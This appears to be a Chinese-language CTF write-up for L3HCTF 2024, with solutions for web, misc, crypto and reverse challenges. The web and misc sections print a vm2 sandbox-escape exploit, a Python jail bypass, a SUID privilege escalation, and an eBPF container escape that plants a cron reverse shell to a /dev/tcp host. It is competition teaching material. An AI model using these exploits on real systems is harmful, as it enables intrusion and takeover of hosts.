L3HCTF 2024 By W&M

Write - Up no tag February 8, 2024

WEB
Misc
Crypto
- babySPN
Reverse

WEB

intractable problem

def factorization(n: string) -> tuple[int]:

'''

import re
print_regex=r'print\("([a-z]+!)",end=""\)'
self_file=open(__file__,"r")
self_content=self_file.read()
self_file.close()
print_match=re.findall(print_regex,self_content)
print(print_match[0],end="")
'''

Interactable problem revenge

def factorization(n):
    def my_generator():
        yield gen.gi_frame.f_back.f_back.f_back
    gen = my_generator()
    for item in gen:
        frame = item
    frame.f_globals["_"+"_builtins_"+"_"].setattr(frame.f_globals["_"+"_builtins_"+"_"],'int',lambda x:123456 if x==123456 else 15241383936)
    return (123456,123456)

Escape web

vm2

https://gist.github.com/leesh3288/f693061e6523c97274ad5298eb2c74e9

命令执行重定向到stderr回显

async function fn() {
    (function stack() {
        new Error().stack;
        stack();
    })();
}
p = fn();
p.constructor = {
    [Symbol.species]: class FakePromise {
        constructor(executor) {
            executor(
                (x) => x,
                (err) => { return err.constructor.constructor('return process')().mainModule.require('child_process').execSync('ls / >&2'); }
            )
        }
    }
};
p.then();

在docker里

// index.js
var fs = require("fs");
var { NodeVM } = require_vm2();
var code = fs.readFileSync("/app/code.js", "utf8");
var vm = new NodeVM({
  timeout: 1e3,
  console: "redirect"
});
vm.on("console.log", (data) => {
  console.log(data);
});
vm.on("console.error", (data) => {
  console.log(data);
});
vm.run(code);

/app/output.txt是stdout输出文件

删除然后软链接/app/output.txt到/flag

在宿主机上读输出文件会读到flag

Java

参数和路由全URL编码即可.http://127.0.0.1/url编码?url编码=file:///flag

Misc

Checkin

L3HCTF{w3LC0m3_70_L3Hc7F}

RAWaterMark

import rawpy
import imageio

path = 'image.ARW'

with rawpy.imread(path) as raw:
    for i in (raw.raw_image % 256)[0]:
        print(i % 2, end="")
010100000100101100000011000001000000101000000000000000000000000000000000000000000001001101111101001101110101100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101000000000001110000000000011001100110110001100001011001110010111101010101010101000000100100000000000000110111011001101101101011110110010111011110011011011010111101100101011101010111100000001011000000000000000100000100111010000000001100000000000000000000010011101000000000110000000000000000010100000100101100000011000001000000101000000000000000000000000000000000000000000101100101111101001101110101100010011011010111011110010100111011001001000000000000000000000000000010010000000000000000000000000000001101000000000001110000000000011001100110110001100001011001110010111101100110011011000110000101100111001011100111010001111000011101000101010101010100000010010000000000000011111110100110110110101111011001011111101001101101101011110110010101110101011110000000101100000000000000010000010011101000000000110000000000000000000001001110100000000011000000000000000001001100001100110100100001000011010101000100011001111011010001000110010100110001011010010110011101101000001101110110100101101110011001110101111101111001001100000111010101011111001101000110110001110111011000010111100101110011010111110101111101000011011000010110111001101111011011100111110101010000010010110000000100000010000111100000001100001010000000000000000000000000000000000000000000010011011111010011011101011000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001010000000000011000000000000000000000000000000000000000000000000000000000000001000000000000111011010100000100000000000000000000000000000000011001100110110001100001011001110010111101010101010101000000010100000000000000110111011001101101101011110110010101110101011110000000101100000000000000010000010011101000000000110000000000000000000001001110100000000011000000000000000001010000010010110000000100000010000111100000001100001010000000000000000000000000000000000000000001011001011111010011011101011000100110110101110111100101001110110010010000000000000000000000000000100100000000000000000000000000000011010000000000011000000000000000000000000000000000000000000000000001000000000000000000000000101001001000000100111111000000000000000000000000011001100110110001100001011001110010111101100110011011000110000101100111001011100111010001111000011101000101010101010100000001010000000000000011111110100110110110101111011001010111010101111000000010110000000000000001000001001110100000000011000000000000000000000100111010000000001100000000000000000101000001001011000001010000011000000000000000000000000000000000000000100000000000000010000000001001111000000000000000000000000010101010000000000000000000000000000000000000000001011001001111000111010101010100011101011101010101110101110101111000001110000101010100111010011001100110111100010100101000000011010101100011010001001100110000110110110101011010110110101110010000111011101000111010111010011110110110110001101110111111011011000010011110110011101011001111000010110110111000100011111011000011111010111111000101010110100010000100100100111111010010010110101001010011101001110010001011100101100011101011100000101101101010101100110111001111011010001101101001101101110010011101011111010000100010010101000110100001001001111100000101100010000111100101000000001011001110101000100000000100100001100101100101011101000011111000100011100110010101001100101100100010011111011011111101100001111111101101011111000011100100010111110010111001100001100000111000001011011001100001110000111000011101001111001011001101000000101101010001010101010010111110100100100100011101111101010110010001001101010001101010100000010010001111100111110001101001111010000100001100011111101111000101110110001101010101101000110011111101111001100010001000000001111100111000100111000100000010110101110110010011110101111011100010010011011011000101001010100010000000110100010011011000110011000110100011111101101000010001010111110011001111001011111111000111100001001011111110101101111100010101110000101101100101101011001001100111010110100010001100101010110100110011100010111101111000101001100011111001111111100000100000001001101001011111110110100001000100101011011101001101100000001101000101000100010000001001100000110110000001100101100011110101000110101001110111001100001111100001110110001010101110111111001010110000010110011100111010100011011000101100000000100111100010011111110100010001111110111101100001101111111111000100000011010001001100011110101010101111010111110001001000010000110101000001111101110111111010100111010101100100000110011111110101111010101111101010010010001000101011000110000101111100110110100001010111011100111001110011111000011010101101001010101111010101101111110101011010111111100110011101001001100001110101010101001000000011100111100011011100111101100101101110101011110111011100100001000010001000101010011111110111011100100000100101101011000101000101000101010010100111011010011001110100111111011010111101100001001100001000011111111100000101001100100111010110011010000001000000011110010110110101010011001010000010000111000101000010000001001001111100111110001101110111000100011111100111100001001101110101110111100001110010111001011100111101110101100110100110100011101000111000001110111110101011000000100111000100100100001001101011010001000110000001101000111100110101111011010011100011010011010101011010000010101000110110010001100010110100100101110010101011011011110001100011110011011000000001010011010000101110111001100010001001000011011110001000010011100100100000001110110001110010110000110010100101010101101101110000011011100101110101001010101000000110011101010101001100001000010010010000101100001111011010110001101001010100011001111111001110011110100000110011101100111101101111110110111110010000100100100010101010110110110011111000010010011101010100011010010011010001111010000011101100000111101010001000100010000100101011000010101000111100001000010011011010101010101010101110100110110011011100110000011010000111011111111110001101001010000000

escape-2

findsuid提权

Added capability list: CAP_SYS_ADMIN

/proc/1/cgroup 是空的 0::/

没权限加载内核模块

内核 5.15.0-1048-kvm

mount任何东西都是cannot mount xxx read-only报错

cap_sys_admin可以操作ebpf，用ebpf注入其他进程getshell？

确实可以加载ebpf

可以看到容器外面的进程的syscall

有cron

那就是复现 https://paper.seebug.org/1750/ 就行了

https://github.com/TomAPU/bpfcronescape/tree/master

从靶机里拿到
/sys/kernel/btf/vmlinux
本地ubuntu22.04编译
/usr/lib/linux-kvm-tools-5.15.0-1048/bpftool btf dump file vmlinux format c > vmlinux.h

sudo apt install linux-tools-5.15.0-1048-kvm

修改makefile
BPFTOOL ?= /usr/lib/linux-kvm-tools-5.15.0-1048/bpftool
VMLINUX := /mnt/c/l3hctf/misc_docker_escape/vmlinux.h
ARCH := x86

修改backdoor.bpf.c
char PAYLOAD[]="* * * * * root  /bin/bash -c \"/bin/sh -i >& /dev/tcp/172.17.0.2/9999 0>&1\"& \n#";

make

靶机上 上传bin/backdoor上去
find . -exec /bin/bash -p \; -quit
./backdoor
另一个窗口 传个busybox上去
./busybox nc -lp 9999

end_of_programming

直接复制他的英文题目和提示，手动填一下里面的变量，问就好了

Crypto

babySPN

附件给了flag

L3HCTF{}

6abd8c217785dc1a7074a1bdc624bd41c6307100cf5e01ee6c58708e0eeb4ce8

Reverse

ez_rust

Rust Tauri 框架

https://blog.yllhwa.com/2023/05/09/Tauri%20%E6%A1%86%E6%9E%B6%E7%9A%84%E9%9D%99%E6%80%81%E8%B5%84%E6%BA%90%E6%8F%90%E5%8F%96%E6%96%B9%E6%B3%95%E6%8E%A2%E7%A9%B6/

能解压rust程序里面的前端源码

<!doctype html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <link rel="icon" type="image/svg+xml" href="/vite.svg" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Tauri + Vue 3 App</title>
    <script type="module" crossorigin src="/assets/index-tWBcqYh-.js"></script>
    <link rel="stylesheet" crossorigin href="/assets/index-3z-7CGFf.css">
  </head>

  <body>
    <div id="app"></div>
  </body>
</html>

主逻辑

暂时无法在飞书文档外展示此内容

里面就是一个异或加b64

import base64
a = base64.b64decode('JFYvMVU5QDoNQjomJlBULSQaCihTAFY=')
s = b'secret'
for i in range(len(a)):
    print(chr(a[i]^s[i%len(s)]),end='')

babycom

应该是一个XTEA

往上逆就行

AES ： CryptDeriveKey(phProv, 0x660Eu, phHash, 1u, &phKey) )

0B AF 51 21 9C 52 10 89 3F 2C 34 30 87 13 C1 4C C1 7F 81 6E BA BD DF 43 1A F0 D7 DE 8E 66 B9 7C

2A B4 C1 74 D6 59 AA 05 73 10 7F 9C 40 49 99 62 3C 84 51 8F 3F 37 AB F1 0E FE 61 96 45 AD 41 6A

试一下我解密的，我直接eip转走了

{

0x74C1B42A, 0x05AA59D6, 0x9C7F1073, 0x62994940, 0x8F51843C, 0xF1AB373F, 0x9661FE0E, 0x6A41AD45

};

#include <stdio.h>

void decry(unsigned int pbData[4], unsigned int MultiByteStr[8])
{
    unsigned int v14; // r11
    unsigned int v15; // r8d
    unsigned int v16; // r10d
    unsigned int v17; // r9d
    unsigned int v19; // r9d
    unsigned int delta = 1131796;
    unsigned int v66 = 0;
    v14 = 0;
    do
    {
        v15 = MultiByteStr[2 * v14];
        v16 = 0x228a280;
        v17 = MultiByteStr[2 * v14 + 1];
        v19 = 2;
        do
        {

            v66 = 16;
            do
            {
                v17 -= (((v15 << 4) ^ (v15 >> 5)) + v15) ^ (v16 + pbData[(v16 >> 11) & 3]);
                v16 -= delta;
                v15 -= (((v17 << 4) ^ (v17 >> 5)) + v17) ^ (v16 + pbData[v16 & 3]);// 0,1,2,3
                v66--;
            } while (v66);

            --v19;
        } while (v19);
        MultiByteStr[2 * v14] = v15;
        MultiByteStr[2 * v14++ + 1] = v17;
    } while (v14 < 4);
}

int main()
{
        unsigned int key[4] = { 0x1CD43EEA,0x47D7CB70,0xDBCA5E98,0x2B390C53 };
    unsigned int data[8] = {
        0x74C1B42A, 0x05AA59D6, 0x9C7F1073, 0x62994940, 0x8F51843C, 0xF1AB373F, 0x9661FE0E, 0x6A41AD45
        };

    decry(key, data);

    for (int i = 0; i < 8; i++)
    {
        printf("%x ", data[i]);
    }

        return 0;
}

hhhc

需要解密h3c配置文件里的pppoe密码

re思路：逆向固件得到密码加密算法

我不会，长大后再学习

misc思路：路由器导入配置并抓包pap明文密码

pppoe pap是明文传输密码的协议。

只要是h3c的路由器（交换机不行,因为不支持pppoe），都可以加载题目给出的加密的密码并且进行pppoe拨号。

因此，伪造一个pppoe服务端并且抓包pppoe客户端拨号时传输的密码即可。

安装hcl模拟器，关闭hyperv否则打不开

创建两个router

第一个router进行配置

system-view
interface Dialer0
ppp pap local-user hustpppoe114514 password cipher $c$3$3PbDU2m2/6Neiiz9iO+i641UKjafFMvrfphBc3fmrZ+9Q2TZu3g5l2Hlg1gJWO6ZQLJ4S+r85qU8EQpqQQ==
dialer bundle enable
dialer-group 2
dialer timer idle 0
dialer timer autodial 5
ip address ppp-negotiate
nat outbound
exit

interface GigabitEthernet0/0
port link-mode route
pppoe-client dial-bundle-number 0
exit

第二个router进行配置

system-view
interface virtual-template 1
ppp authentication-mode pap domain dm1
quit
interface gigabitethernet 0/0
pppoe-server bind virtual-template 1
quit
local-user hustpppoe114514 class network 
password cipher $c$3$3PbDU2m2/6Neiiz9iO+i641UKjafFMvrfphBc3fmrZ+9Q2TZu3g5l2Hlg1gJWO6ZQLJ4S+r85qU8EQpqQQ==
service-type ppp
quit

右键连线进行抓包